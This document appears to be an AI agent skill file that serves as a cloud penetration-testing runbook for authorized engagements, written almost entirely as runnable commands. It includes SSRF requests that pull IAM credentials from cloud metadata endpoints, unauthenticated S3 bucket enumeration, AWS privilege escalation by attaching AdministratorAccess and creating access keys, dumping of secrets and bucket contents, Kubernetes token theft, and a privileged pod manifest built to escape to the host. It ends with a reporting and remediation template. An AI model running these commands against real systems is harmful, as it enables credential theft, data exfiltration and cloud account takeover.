| name | pentest-cloud |
| description | Cloud security testing — AWS/Azure/GCP asset discovery, S3 public bucket enumeration, SSRF-to-metadata credential theft, IAM abuse, Kubernetes/container escape, secret scanning in repos, and automated misconfiguration auditing for authorized engagements. |
| triggers | ["cloud","AWS","Azure","GCP","S3 bucket","IAM","Lambda","EC2","Kubernetes","k8s","container escape","metadata","169.254.169.254","pacu","prowler","trivy","cloud security","cloud misconfiguration","cloud pentest","secrets scanning","gitleaks","truffleHog"] |
Cloud Security Penetration Testing Skill
Cloud Attack Surface Overview
| Target | Black-Box Vectors | Post-Cred Vectors |
|---|
| AWS S3 | Public bucket enum, SSRF→metadata | s3 ls, data exfil |
| AWS IAM | N/A (need creds) | Escalation, new user, policy attach |
| AWS EC2 | SSRF→IMDSv1 | Instance commands, lateral movement |
| AWS Lambda | SSRF if deployed | env vars = secrets |
| AWS Secrets | N/A | secretsmanager, SSM param store |
| Azure AD | OSINT, password spray | roadrecon, token abuse |
| GCP | SSRF→metadata token | Bucket enum, IAM query |
| Kubernetes | kube-hunter | Token abuse, container escape |
Phase 1 — Cloud Asset Discovery (Black-Box)
Install Tools
pip3 install prowler truffleHog scoutsuite pacu awscli
apt-get install -y awscli gitleaks trivy
S3 Bucket Enumeration (No Credentials)
TARGET="company"
for bucket in $TARGET ${TARGET}-dev ${TARGET}-prod ${TARGET}-staging \
${TARGET}-backup ${TARGET}-data ${TARGET}-assets ${TARGET}-logs \
${TARGET}-images ${TARGET}-static ${TARGET}-media ${TARGET}-public; do
RESULT=$(aws s3 ls s3://$bucket --no-sign-request 2>&1)
if echo "$RESULT" | grep -qv "AccessDenied\|NoSuchBucket"; then
echo "[OPEN] $bucket" && echo "$RESULT" | head -20 \
>> /root/kali-workspace/s3-open-buckets.txt
fi
done
curl -s https://<company>.s3.amazonaws.com/ | head -30
curl -s https://s3.amazonaws.com/<company>/ | head -30
gau <domain> | grep -E "s3\.amazonaws\.com|\.s3\." | sort -u \
| tee /root/kali-workspace/s3-refs.txt
SSRF → Cloud Metadata (Critical Path)
curl -s 'http://<target>/api/fetch?url=http://127.0.0.1/'
curl -s 'http://<target>/redirect?to=http://127.0.0.1/'
curl -s 'http://<target>/fetch?url=http://169.254.169.254/'
curl -s 'http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/'
curl -s 'http://<target>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
ROLE=$(curl -s 'http://<t>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/')
curl -s "http://<t>/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE"
curl -s 'http://<target>/fetch?url=http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
curl -s 'http://<target>/fetch?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01'
Phase 2 — AWS Exploitation (With Stolen Credentials)
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="<secret>"
export AWS_SESSION_TOKEN="<token>"
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name <user>
aws iam list-user-policies --user-name <user>
aws iam get-user-policy --user-name <user> --policy-name <policy>
aws iam simulate-principal-policy \
--policy-source-arn <arn> \
--action-names s3:ListAllMyBuckets ec2:DescribeInstances iam:CreateUser
aws s3 ls
aws s3 ls s3://<bucket> --recursive
aws s3 cp s3://<bucket>/<file> /root/kali-workspace/s3-loot/
aws iam list-users && aws iam list-roles && aws iam list-groups
aws iam attach-user-policy --user-name <user> \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name <user>
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id <name>
aws ssm describe-parameters
aws ssm get-parameter --name <param> --with-decryption
aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].[InstanceId,PrivateIpAddress,PublicIpAddress,Tags]'
aws lambda list-functions \
--query 'Functions[*].[FunctionName,Runtime,Environment.Variables]'
aws lambda get-function-configuration --function-name <func>
Phase 3 — Automated Cloud Security Assessment
prowler aws --region us-east-1 -M text,json -o /root/kali-workspace/prowler/
prowler aws --check \
s3_bucket_public_access s3_bucket_policy_public_access \
iam_root_no_access_keys iam_password_policy_minimum_length \
ec2_imdsv2_enabled cloudtrail_enabled --region us-east-1
pacu --new-session pentest
python3 -m scout aws --report-dir /root/kali-workspace/scoutsuite/
python3 -m scout azure --report-dir /root/kali-workspace/scoutsuite-az/
Phase 4 — Container & Kubernetes Security
trivy image <docker_image>:latest --severity CRITICAL,HIGH
trivy image --no-progress nginx:latest -f table
trivy fs /path/to/repo --severity CRITICAL,HIGH
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null && echo "Inside Docker container"
capsh --print 2>/dev/null | grep "cap_sys_admin"
mount | grep "/ type"
ls -la /dev/ | wc -l
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp 2>/dev/null
cat /var/run/secrets/kubernetes.io/serviceaccount/token
CA=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
curl -s --cacert $CA -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces
curl -s --cacert $CA -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/namespaces/default/pods
curl -s --cacert $CA -H "Authorization: Bearer $TOKEN" $APISERVER/api/v1/secrets
kube-hunter --remote <k8s_api_ip>
kube-hunter --pod
cat > /tmp/escape-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
name: escape
spec:
hostPID: true
hostIPC: true
hostNetwork: true
containers:
- name: escape
image: alpine
command: ["/bin/sh", "-c", "chroot /mnt/host /bin/bash"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /mnt/host
name: host-vol
volumes:
- name: host-vol
hostPath:
path: /
EOF
kubectl apply -f /tmp/escape-pod.yaml
Phase 5 — Secret Scanning
trufflehog git https://github.com/<org>/<repo> --only-verified
trufflehog git https://github.com/<org>/<repo> --no-verification
trufflehog filesystem /path/to/code
trufflehog s3 --bucket=<bucket-name>
gitleaks detect --source . -v
gitleaks detect --source /path/to/repo \
--report-path /root/kali-workspace/gitleaks.json \
--report-format json
gitleaks detect --source . --no-git
grep -rn "AKIA[0-9A-Z]{16}" /path/to/code
grep -rn "aws_secret_access_key\s*=\s*['\"][^'\"]{1,}" /path/
grep -rn "-----BEGIN.*PRIVATE KEY-----" /path/
grep -rn "password\s*[:=]\s*['\"][^'\"]{6,}['\"]" /path/
Phase 6 — Cloud Reporting Template
# Cloud Security Assessment — <Target Environment>
## Critical Findings
### [CRITICAL] SSRF → AWS Metadata Credential Theft
- Vector: Parameter `url=` in /api/fetch allows SSRF
- Proof: Retrieved IAM role credentials via http://169.254.169.254
- Credentials: AccessKeyId=ASIA... (temporary, rotated post-engagement)
- Impact: Full AWS account access with role permissions
### [CRITICAL] Public S3 Bucket: company-backups
- Proof: `aws s3 ls s3://company-backups --no-sign-request` succeeded
- Contents: 2,341 files including database dumps + config files
- Impact: Data breach — sensitive data publicly downloadable
### [HIGH] IAM User with AdministratorAccess Policy
- User: deploy-service-account
- Proof: `aws iam list-attached-user-policies` output
- Impact: Full account takeover if credentials compromised
### [HIGH] EC2 Instances Using IMDSv1 (SSRF-exploitable)
- Count: 14 of 20 instances
- Proof: prowler check ec2_imdsv2_enabled
- Impact: Any SSRF vulnerability → credential theft
## Container Findings
| Finding | Severity | Evidence |
| ---------------------------- | -------- | --------------------------------- |
| Privileged container running | CRITICAL | capsh --print shows cap_sys_admin |
| Critical CVE in base image | HIGH | trivy output |
## Recommendations
1. Enforce IMDSv2 on ALL EC2 instances (blocks SSRF metadata attacks)
2. Enable S3 Block Public Access at account level
3. Rotate all credentials obtained during this assessment
4. Implement least-privilege IAM — remove AdministratorAccess policy
5. Enable GuardDuty + CloudTrail in all regions
6. Prohibit privileged containers in Kubernetes admission policy
ATT&CK Mapping
| Technique | ID | Tool |
|---|
| Cloud Infrastructure Discovery | T1580 | prowler, aws cli |
| Steal Application Access Token | T1528 | SSRF → metadata |
| Data from Cloud Storage | T1530 | aws s3, pacu |
| Unsecured Credentials in Files | T1552.001 | truffleHog, gitleaks |
| Container Escape | T1611 | privileged container abuse |
| Valid Accounts: Cloud Accounts | T1078.004 | Stolen IAM creds |
| Modify Cloud Compute Infrastructure | T1578 | pacu exploitation |